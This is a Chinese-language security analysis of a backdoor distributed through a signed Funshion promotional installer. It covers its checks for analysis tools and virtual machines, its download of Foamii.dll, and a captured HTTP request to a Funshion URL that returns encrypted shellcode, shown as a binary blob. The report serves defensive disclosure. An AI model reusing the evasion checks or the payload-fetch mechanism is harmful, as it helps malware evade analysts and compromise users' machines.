# 木马盗用“风行播放器签名”流氓推广
by qxnjawk
0x00 摘要
=======
* * *
最近,360安全中心检测到,大量推广程序在推广一款带有有效风行签名——“Beijing Funshion Online Technologies Ltd.”的静默安装程序。后续分析发现,该程序静默安装,无法卸载,通过LSP注入系统各个联网进程执行。带有反虚拟机,反调试,抗分析,远程控制,远程执行的能力,是一款植入用户计算机的后门程序。
0x01 FunMini文件分析
================
* * *
基本信息:
—–
* MD5 : 64a34cc9a22fa93d0705920e4c3aed0c
* 文件名称 : FunMini.exe
* 文件类型 : PE,未加壳
* 签名信息 : Beijing Funshion Online Technologies Ltd.
* 签名正常 风行公司的推广程序
行为概述:
—–
该样本运行之后,会对目标机器的环境进行检测:检测虚拟机,各种程序开发工具等。
如果不存在开发工具和虚拟机,就会下载一个后门dll程序加载执行,该dll还会进行手机app推广。
行为详解:
—–
木马检查用户机器上是否存在IDA, vc6.0, windbg.exe等分析人员常用的分析工具。这类检测在木马程序中很常见,正常面向大众的软件,很少做这类检测。
以下为木马检测的所有字符串的内存截图:
检测通过之后,后门从服务器下载一个名为Foamii.dll的文件,而该文件才是一切行为的核心。
0x02 Foamii.dll文件分析
===================
* * *
基本信息:
—–
* 名称 : Foamii.dll
* MD5 : a8367b1199422f103da439678a1a3683
* 文件类型 : win32 PE,DLL
* 签名信息 : Beijing Funshion Online Technologies Ltd.
* 签名正常
行为详解:
—–
木马首先调用WinExec函数启动rundll32.exe作为宿主进程,调用Foamii.dll的startup函数
运行后,dll会从服务器读取在线shellcode代码到本地
shellcode的远端地址竟然就堂而皇之的挂在风行官网上:`http://fld.funshion.com/instant/instant?bid=52`用浏览器打开该URL内容如下:
数据报文如下图:
“`
GET /instant/instant?bid=52 HTTP/1.1
Cache-Control: max-age=43200
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Funshion/1.0.0.1
Host: fld.funshion.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Wed, 23 Sep 2015 07:12:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
184
..TKDS…..$..e..1..}…_/…6………..d..`CG..W…S…..V……=-…..\.Gd4..*..a}…X.#..Y…}R …o\W.]I.M.Jw…%.Lm.l._..Zq..n1.X[+F.+….~…c.J…~.]./..’d2…….z.c(.{.(.n..%..8=.3`.`.W…!….E..1.j.U….[..
#……T&…/……!<.iDEKOY@….=yH.i.MV…..i…..A…..e.._g.YL`…..,5]R..`……&
Y….(e….@.J.%.O.T.l..U+…….5..6.]..a{`.? .IEX….
请登录后查看评论内容